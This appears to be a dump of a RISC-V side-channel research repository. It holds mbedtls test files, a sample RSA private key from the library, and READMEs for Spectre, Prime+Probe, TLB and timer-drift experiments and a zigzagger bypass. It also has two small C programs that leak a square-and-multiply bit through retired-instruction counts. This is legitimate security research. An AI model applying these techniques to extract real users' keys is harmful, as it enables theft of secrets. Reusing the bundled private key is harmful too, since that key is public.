/mbedtls-key-leak/mbedtls/tests/suites/test_suite_pbkdf2.function: -------------------------------------------------------------------------------- 1 | /* BEGIN_HEADER */ 2 | #include 3 | /* END_HEADER */ 4 | 5 | /* BEGIN_DEPENDENCIES 6 | * depends_on:POLARSSL_PBKDF2_C 7 | * END_DEPENDENCIES 8 | */ 9 | 10 | /* BEGIN_CASE */ 11 | void pbkdf2_hmac( int hash, char *hex_password_string, char *hex_salt_string, 12 | int it_cnt, int key_len, char *result_key_string ) 13 | { 14 | unsigned char pw_str[100]; 15 | unsigned char salt_str[100]; 16 | unsigned char dst_str[100]; 17 | 18 | md_context_t ctx; 19 | const md_info_t *info; 20 | 21 | int pw_len, salt_len; 22 | unsigned char key[100]; 23 | 24 | md_init( &ctx ); 25 | 26 | memset(pw_str, 0x00, 100); 27 | memset(salt_str, 0x00, 100); 28 | memset(dst_str, 0x00, 100); 29 | 30 | pw_len = unhexify( pw_str, hex_password_string ); 31 | salt_len = unhexify( salt_str, hex_salt_string ); 32 | 33 | 34 | info = md_info_from_type( hash ); 35 | TEST_ASSERT( info != NULL ); 36 | if( info == NULL ) 37 | return; 38 | TEST_ASSERT( md_init_ctx( &ctx, info ) == 0 ); 39 | TEST_ASSERT( pbkdf2_hmac( &ctx, pw_str, pw_len, salt_str, salt_len, 40 | it_cnt, key_len, key ) == 0 ); 41 | 42 | hexify( dst_str, key, key_len ); 43 | TEST_ASSERT( strcmp( (char *) dst_str, result_key_string ) == 0 ); 44 | 45 | exit: 46 | md_free( &ctx ); 47 | } 48 | /* END_CASE */ 49 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_pem.function: -------------------------------------------------------------------------------- 1 | /* BEGIN_HEADER */ 2 | #include 3 | #include 4 | /* END_HEADER */ 5 | 6 | /* BEGIN_DEPENDENCIES 7 | * depends_on:POLARSSL_PEM_WRITE_C 8 | * END_DEPENDENCIES 9 | */ 10 | 11 | /* BEGIN_CASE */ 12 | void pem_write_buffer( char *start, char *end, char *buf_str, char *result_str ) 13 | { 14 | unsigned char buf[5000]; 15 | unsigned char *check_buf = NULL; 16 | int ret; 17 | size_t buf_len, olen = 0, olen2 = 0; 18 | 19 | memset( buf, 0, sizeof( buf ) ); 20 | 21 | buf_len = unhexify( buf, buf_str ); 22 | 23 | ret = pem_write_buffer( start, end, buf, buf_len, NULL, 0, &olen ); 24 | TEST_ASSERT( ret == POLARSSL_ERR_BASE64_BUFFER_TOO_SMALL ); 25 | 26 | check_buf = (unsigned char *) polarssl_malloc( olen ); 27 | TEST_ASSERT( check_buf != NULL ); 28 | 29 | memset( check_buf, 0, olen ); 30 | ret = pem_write_buffer( start, end, buf, buf_len, check_buf, olen, &olen2 ); 31 | 32 | TEST_ASSERT( olen2 <= olen ); 33 | TEST_ASSERT( olen > strlen( (char*) result_str ) ); 34 | TEST_ASSERT( ret == 0 ); 35 | TEST_ASSERT( strncmp( (char *) check_buf, (char *) result_str, olen ) == 0 ); 36 | 37 | exit: 38 | polarssl_free( check_buf ); 39 | } 40 | /* END_CASE */ 41 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/suites/test_suite_version.data: -------------------------------------------------------------------------------- 1 | Check compiletime library version 2 | check_compiletime_version:"1.3.10" 3 | 4 | Check runtime library version 5 | check_runtime_version:"1.3.10" 6 | 7 | Check for POLARSSL_VERSION_C 8 | check_feature:"POLARSSL_VERSION_C":0 9 | 10 | Check for POLARSSL_AES_C when already present 11 | depends_on:POLARSSL_AES_C 12 | check_feature:"POLARSSL_AES_C":0 13 | 14 | Check for unknown define 15 | check_feature:"POLARSSL_UNKNOWN":-1 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/visualc/VS6/dh_prime.txt: -------------------------------------------------------------------------------- 1 | P = C3CF8BCFD9E88B0CC35EC526F3D63FA001DC9392E6CA81F3B414173955C582758B52038FAFBF402B8C29DC32F5231B0D2E25B252850C7DCDBFF46D0E7989E51DEA07A53BCF7947D4C95EBA28F9CBAFB0267EC3BCF57B15A49964236B56773851D6621E546F410D504F13827218CD14A1FDB69522DC72DD67D880E51B2E00894F 2 | G = 04 3 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/visualc/VS6/rsa_priv.txt: -------------------------------------------------------------------------------- 1 | N=6F440E8C8510107B2040ADEC23C2052769FF89E5EAE061AD5FCE8556E051DBF25FBA31DC83AAFCDFACA70912B8BA8CC73EC67132AB66CE79D2F91A190D57CC42C148728B33190D85E311F1744BF6DB95E7C2DBDC8C3FC291825527BC5556E67FFAD2CAB926A6FBF2B47BC746BEC67A8C205C3AFD4028FC0864F5EEEB27FFA91B 2 | E=010001 3 | D=0D277AA0DA4A5FE86E93B6FC27EE1435E8AE315B613D4DCEF578B102E85A452A8E6EB0DE65229DEAC3BAABB3EEEAFF21BF262ED3D2B7C0C95E4BDCEE0149D3F81746F38B0D2A36390258BEC37C337E1608859E0133C686E139B6F5162E38F204C61CFBD30ED0F4314B2B079B36EC163225262D618BC4EA0CDF533E7308C41E41 4 | P=D831261F5EDE9AFD544C95B2BAAF93BEC1032F4426DC048ACA686ED0813A2779B04D09398D3761786781B3B740B16ADAA81D4918ABCBD61F5FD5D726A7DAD843 5 | Q=83C0E71E39D1ED34E12EC9B54F7EB6ACC5E27B566348B17A9B1B6A60F2ABBD1E137C0B3E7CE3693D215A3312C774B5E177713727D005331148C9FEFA511F2A49 6 | DP=87C8C6D2E939134B8D48D4B4FF000BE1C14488C95B46D12B82D978D0487A08152C20166D293EE15F48537456E2B10C15ED8507461190E319AD8D97A655C2E415 7 | DQ=067720E04AD6125DD5EF05D6EFDFB7F7227ECAAEA2909EA4F59792D0CF17BE600B74BAD8862862B1AD414FE04C095E238248FBFBE82959282FFA3998EF022881 8 | QP=8C2FAEF2C7F8FEE6C6F2B4F811DA5745A3328E5B06256C5F7E8F924EC6E552718095A2F9B4B52DE5B7B22F697FB3CC6D72ED6415555CDC2C4B193D2296249488 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/visualc/VS6/rsa_pub.txt: -------------------------------------------------------------------------------- 1 | N=6F440E8C8510107B2040ADEC23C2052769FF89E5EAE061AD5FCE8556E051DBF25FBA31DC83AAFCDFACA70912B8BA8CC73EC67132AB66CE79D2F91A190D57CC42C148728B33190D85E311F1744BF6DB95E7C2DBDC8C3FC291825527BC5556E67FFAD2CAB926A6FBF2B47BC746BEC67A8C205C3AFD4028FC0864F5EEEB27FFA91B 2 | E=010001 3 | -------------------------------------------------------------------------------- /page-walk/Makefile: -------------------------------------------------------------------------------- 1 | all: main.c 2 | gcc main.c -Os -o main 3 | 4 | clean: 5 | rm -f main 6 | -------------------------------------------------------------------------------- /page-walk/README.md: -------------------------------------------------------------------------------- 1 | # Retired instructions for Page Table Walks 2 | 3 | This experiment shows that a page table walk does not issue additional instructions that could be observed using the `rdinstret` instruction. 4 | 5 | # Run code 6 | Run `make` followed by `./main` 7 | 8 | ## Works on 9 | U74 (timing difference and retired instruction difference), C906, C910, C908 (timing difference) -------------------------------------------------------------------------------- /page-walk/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "../rlibsc.h" 6 | 7 | #define REP5(x) x x x x x 8 | #define REP10(x) REP5(x) REP5(x) 9 | 10 | char __attribute__((aligned(4096))) buffer[4096 * 32]; 11 | static inline void evict(void *addr) { 12 | int i = 1; 13 | REP10(maccess(buffer + i++ * 4096);) 14 | } 15 | 16 | char __attribute__((aligned(4096))) target[4096]; 17 | 18 | int main() { 19 | memset(target, 1, sizeof(target)); 20 | memset(buffer, 2, sizeof(buffer)); 21 | for (int i = 0; i < 2; i++) { 22 | if (i == 0) 23 | printf("[ No Walk ]\n"); 24 | else 25 | printf("[ Walk ]\n"); 26 | size_t sum = 0, min = -1, sumt = 0, mint = -1; 27 | for (int avg = 0; avg < 10; avg++) { 28 | if (i == 0) 29 | maccess(target + 256); 30 | else 31 | evict(target); 32 | size_t start = rdcycle(); 33 | size_t before = rdinstret(); 34 | maccess(target); 35 | size_t after = rdinstret(); 36 | size_t end = rdcycle(); 37 | size_t delta = after - before; 38 | sum += delta; 39 | if (delta < min) 40 | min = delta; 41 | delta = end - start; 42 | sumt += delta; 43 | if (delta < mint) 44 | mint = delta; 45 | } 46 | printf("Retired: %zd (avg: %zd) | Time: %zd (avg: %zd)\n", min, sum / 10, 47 | mint, sumt / 10); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /prime_probe_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist-c906 hist-u74 2 | 3 | hist-c906: hist.c 4 | gcc hist.c -DC906 -Os -o hist-c906 5 | 6 | hist-u74: hist.c 7 | gcc hist.c -DU74 -Os -o hist-u74 8 | 9 | clean: 10 | rm -f hist-c906 hist-u74 11 | 12 | -------------------------------------------------------------------------------- /prime_probe_histogram/README.md: -------------------------------------------------------------------------------- 1 | # Prime+Probe Histogram 2 | 3 | Prints a simple Prime+Probe histogram. 4 | To prime a cache set, the PoC simply accesses 6 addresses that (probably) fall into the same set of the 4-way set-associative data cache. 5 | 6 | # Run 7 | Running `make` gives two binaries, run `hist-c906` if testing on the C906 processor and `hist-u74` if testing on the U74 processor. 8 | 9 | # Works on 10 | C906, U74 -------------------------------------------------------------------------------- /spectre-v1/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /spectre-v1/README.md: -------------------------------------------------------------------------------- 1 | # Spectre v1 2 | 3 | Simple demonstration of Spectre v1 style prefetching. 4 | A conditional branch is mistrained, leading to speculative fetching of code. 5 | The experiment shows that the code is sometimes cached even though it is not accessed architecturally. 6 | Adding several `nop`s before the transient execution of the victim function stops the leakage (poor man's fence). 7 | 8 | # Run Code 9 | Run `make` then `./hist` 10 | 11 | # Works on 12 | C906,U74 -------------------------------------------------------------------------------- /spectre/Makefile: -------------------------------------------------------------------------------- 1 | all: spectre 2 | 3 | spectre: spectre.c 4 | gcc spectre.c -Os -o spectre 5 | 6 | clean: 7 | rm -f spectre -------------------------------------------------------------------------------- /spectre/README.md: -------------------------------------------------------------------------------- 1 | # Spectre 2 | A simple demonstration of Spectre data leakage. 3 | Only works on cores with speculative execution. 4 | 5 | # Run Code 6 | Run `make` then `./spectre`. 7 | You should see the leaked string `Spectre on RISC-V hardware!` 8 | 9 | # Works on 10 | C910 -------------------------------------------------------------------------------- /square-multiply/Makefile: -------------------------------------------------------------------------------- 1 | all: main 2 | 3 | main: main.c 4 | gcc main.c -Os -o main 5 | 6 | clean: 7 | rm -f main 8 | 9 | -------------------------------------------------------------------------------- /square-multiply/README.md: -------------------------------------------------------------------------------- 1 | # Padded Square-and-Multiply 2 | 3 | A toy square-and-multiply implementation that has constant cycles, but leaks when looking at the number of retired instructions. 4 | As only a single measurement is performed the timing can be unstable (especially on the U74). 5 | 6 | # Run 7 | Run `make` then `./main` 8 | 9 | # Works on 10 | C906, U74, C910, C908 11 | 12 | -------------------------------------------------------------------------------- /square-multiply/main.c: -------------------------------------------------------------------------------- 1 | #include "../rlibsc.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | volatile uint64_t foo; 9 | 10 | uint64_t __attribute__((noinline)) 11 | square_multiply(int bit, uint64_t a, uint64_t b) { 12 | foo = 1; 13 | a *= a; 14 | if (bit) { 15 | a *= b; 16 | } else { 17 | REP3(asm volatile("nop");) 18 | } 19 | return a; 20 | } 21 | 22 | int main(int argc, char *argv[]) { 23 | square_multiply(0, 5, 7); 24 | square_multiply(1, 5, 7); 25 | 26 | uint64_t start = rdcycle(); 27 | square_multiply(0, 5, 7); 28 | uint64_t end = rdcycle(); 29 | uint64_t b0 = end - start; 30 | start = rdcycle(); 31 | square_multiply(1, 5, 7); 32 | end = rdcycle(); 33 | uint64_t b1 = end - start; 34 | printf("Timing 0: %zd\n", b0); 35 | printf("Timing 1: %zd\n", b1); 36 | 37 | square_multiply(0, 5, 7); 38 | square_multiply(1, 5, 7); 39 | 40 | start = rdinstret(); 41 | square_multiply(0, 5, 7); 42 | end = rdinstret(); 43 | b0 = end - start; 44 | start = rdinstret(); 45 | square_multiply(1, 5, 7); 46 | end = rdinstret(); 47 | b1 = end - start; 48 | printf("Retired instr. 0: %zd\n", b0); 49 | printf("Retired instr. 1: %zd\n", b1); 50 | 51 | return 0; 52 | } 53 | -------------------------------------------------------------------------------- /timer-drift/Makefile: -------------------------------------------------------------------------------- 1 | all: main 2 | 3 | main: main.c 4 | gcc main.c -Os -o main 5 | 6 | clean: 7 | rm -f main 8 | 9 | -------------------------------------------------------------------------------- /timer-drift/README.md: -------------------------------------------------------------------------------- 1 | # Timer Drift to Detect Network Activity 2 | 3 | Look at the difference of retired instructions over a 1s interval to detect network activity. 4 | As the CPU frequency, and thus the cycles/second are fixed, and the retired instructions are counted for the core, this ratio show if something else, e.g., the kernel executes code. 5 | To test, run the program and from a different machine run `ping -s 50000 -i 3 `. 6 | -------------------------------------------------------------------------------- /timer-evaluation/Makefile: -------------------------------------------------------------------------------- 1 | all: main timer-resolution 2 | 3 | main: main.c 4 | gcc main.c -Os -o main 5 | 6 | timer-resolution: timer-resolution.c 7 | gcc timer-resolution.c -Os -o timer-resolution 8 | 9 | clean: 10 | rm -f main timer-resolution 11 | 12 | -------------------------------------------------------------------------------- /timer-evaluation/README.md: -------------------------------------------------------------------------------- 1 | # Timer precision evaluation script 2 | Evaluates all availiable timers present on the RISC-V system. 3 | 4 | # Run code 5 | To run the main timer benchmark simply run `make; ./main` this should print a table simmilar to the one below. 6 | To check the timer increment run `make; ./timer-resulution` which should give the timer increments for each counter. 7 | 8 | ## Works on 9 | C906, U74, C910 -------------------------------------------------------------------------------- /tlb_evict_histogram/Makefile: -------------------------------------------------------------------------------- 1 | all: hist 2 | 3 | hist: hist.c 4 | gcc hist.c -Os -o hist 5 | 6 | clean: 7 | rm -f hist 8 | 9 | -------------------------------------------------------------------------------- /tlb_evict_histogram/README.md: -------------------------------------------------------------------------------- 1 | # TLB Evict Histogram 2 | Prints a simple TLB eviction histogram. 3 | To evict, the PoC simply accesses 10 addresses on different pages forcing one address out of the TLB. 4 | 5 | ## Run code 6 | Simply `make; ./hist` should produce an output simmilar to the one below. 7 | 8 | ## Works on 9 | C906, U74, C910, C908 -------------------------------------------------------------------------------- /zigzagger/Makefile: -------------------------------------------------------------------------------- 1 | all: main 2 | 3 | main: main.c 4 | gcc main.c asm.S -Os -o main 5 | 6 | clean: 7 | rm -f main 8 | 9 | -------------------------------------------------------------------------------- /zigzagger/README.md: -------------------------------------------------------------------------------- 1 | # Zigzagger case study 2 | By counting the retired instructions using the rdcycle instruction the zigzagger mitigation can be bypassed. 3 | The asm.S file contains the target assembly code implementing the mitigation. 4 | 5 | ## Run the code 6 | Simply run `make` and then `./main` you should see an output simmilar to the one displayed below. 7 | 8 | ## Works on 9 | C906,U74,C910,C98 --------------------------------------------------------------------------------